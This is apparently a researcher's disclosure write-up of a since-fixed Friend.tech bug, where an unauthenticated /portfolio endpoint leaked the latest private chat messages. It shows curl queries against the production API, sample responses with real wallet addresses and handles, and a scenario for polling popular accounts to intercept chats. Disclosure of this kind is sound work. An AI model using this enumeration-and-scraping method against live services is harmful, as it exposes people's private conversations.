Chat Room Messages Leak on Friend.tech
Accessing the most recent message sent to each of the chat rooms a particular user is part of is open to anyone. Ownership of shares or even an account within the app is not required.
What is Friend.tech
According to CryptoPress:
Friend.tech is a new social app that allows users to tokenize their social network. In essence, people can sell “shares” of themselves, and these share owners can privately chat with the person they own shares in.
Bug description
While using the app, a web proxy was initially used to capture the HTTP communication in order to gain knowledge about its inner workings.
The api is located at the following URL:
https://prod-api.kosetto.com/
The wallets of the top users can be found on the platform by simply running the query below:
curl -ik "https://prod-api.kosetto.com/lists/top-by-price"
HTTP/2 200 OK
Date: Sun, 20 Aug 2023 08:23:15 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 17405
X-Powered-By: Express
Access-Control-Allow-Origin: https://www.friend.tech
Vary: Origin
Etag: W/"43fd-J0hFxxH9eT4QRgl9l2sMz90Xm0M"
{"users":[{"id":903,"address":"0x4e5f7e4a774bd30b9bdca7eb84ce3681a71676e1","twitterUsername":"cobie","twitterName":"Cobie","twitterPfpUrl":"https://pbs.twimg.com/profile_images/1688496375707701248/WwWz33DI.jpg","twitterUserId":"2259434528","lastOnline":1691761722180,"displayPrice":"2756250000000000000","holderCount":167,"shareSupply":214},{"id":304,"address":"0xecd55f15f1b1d5eb2d6627f69a2d93161b0c572d","twitterUsername":"0xSisyphus","twitterName":"Sisyphus","twitterPfpUrl":"https://pbs.twimg.com/profile_images/1444824208790392832/YqjYT0SD.png","twitterUserId":"1366930865574584323","lastOnline":1691761594422,"displayPrice":"2232562499999999700","holderCount":149,"shareSupply":189},
[...]
To query users, their wallet address is passed as a parameter in the URL, for example, like this:
curl -ik "https://prod-api.kosetto.com/users/0x4e5f7e4a774bd30b9bdca7eb84ce3681a71676e1"
HTTP/2 200
date: Sun, 20 Aug 2023 09:19:41 GMT
content-type: application/json; charset=utf-8
content-length: 381
x-powered-by: Express
vary: Origin
etag: W/"17d-8K13OARr6Sab18LK2Zmc2zrBMr0"
{"id":903,"address":"0x4e5f7e4a774bd30b9bdca7eb84ce3681a71676e1","twitterUsername":"cobie","twitterName":"Cobie","twitterPfpUrl":"https://pbs.twimg.com/profile_images/1688496375707701248/WwWz33DI.jpg","twitterUserId":"2259434528","lastOnline":1691761722180,"holderCount":165,"holdingCount":12,"shareSupply":212,"displayPrice":"2704000000000000000","lifetimeFeesCollectedInWei":"0"}
Clearly, the most interesting attack vector involves accessing chat rooms of users who don't own any shares. While browsing through a list of existing chats, I noticed the following endpoint that could be queried:
https://prod-api.kosetto.com/portfolio/<address>
It returned various information about the user’s holdings. Surprisingly it also included last message and it’s author from each chat the queried user was in. Anyone with knowledge of a user's address could send this query. I decided to try this on the top-ranked account at the time of writing - Cobie:
curl -s "https://prod-api.kosetto.com/portfolio/0x4e5f7e4a774bd30b9bdca7eb84ce3681a71676e1" | json_pp
Here's a section of the output that doesn't expose any sensitive information. In this portion, 'lastMessageName
' refers to the author, while 'lastMessageText
' contains the message content.
No authentication is necessary to access any user's portfolio. This implies that downloading messages is feasible not only for Friend.tech users, but for anyone who knows the user's wallet address - which is also publicly available on-chain.
Attack scenario
An illustrative real attack scenario could involve compiling a list of the most popular accounts through the 'lists/top-by-price
' method. Subsequently, one could consistently track '/portfolio/<address>
' and record all 'lastMessageName' and 'lastMessageText
' values to intercept ongoing discussions in real time within these private groups. Certainly some interesting information could be gathered.
Fix
10:44 GMT+2 20 Aug 2023 - reached out to Friend.tech via Twitter
14:44 GMT+2 20 Aug 2023 - with the help of @0xfoobar contact was established
15:10 GMT+2 20 Aug 2023 - Friend.tech team deployed a fix
Conclusion
I advise anyone using the Friend.tech beta version not to share any sensitive information in such chats, especially during the beta stage when more bugs are likely to emerge. Besides the technical considerations, it's reasonable to assume that group chats may eventually be leaked by insiders anyway, although this is unrelated to technical aspects. The prompt and professional response of the team is also noteworthy, underscoring their strong commitment to platform security.